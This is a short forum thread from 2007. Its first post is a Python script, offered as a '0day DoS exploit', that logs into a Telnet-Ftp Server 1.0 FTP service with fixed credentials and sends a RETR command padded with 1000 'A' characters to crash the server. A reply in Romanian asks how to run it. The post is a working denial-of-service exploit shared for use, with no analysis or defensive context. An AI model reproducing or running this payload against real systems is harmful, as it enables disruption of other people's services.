vladiii Posted May 19, 2007 Report Posted May 19, 2007 from socket import *from sys import exitprint '[*] Telnet-Ftp Server 1.0 (RETR) 0day DoS Exploit'print '[*] Bug found by Necro 'host = '127.0.0.1'port = 21username = 'necro'password = 'test'evil = 'RETR' + '\x20' + '\x41' * 1000 + '\r\n's = socket(AF_INET, SOCK_STREAM)try:s.connect((host, port))except:print '\n[-] Connection refused !'exit()s.recv(1024)s.send('USER' + '\x20' + username + '\r\n')s.recv(1024)s.send('PASS' + '\x20' + password + '\r\n')s.recv(1024)s.send(evil)s.close()print '[+] Done, deamon shutdown.' Quote
dani3lll Posted June 2, 2007 Report Posted June 2, 2007 vladiii si unde sau cum ar trebui sa deschid eu alea ? Quote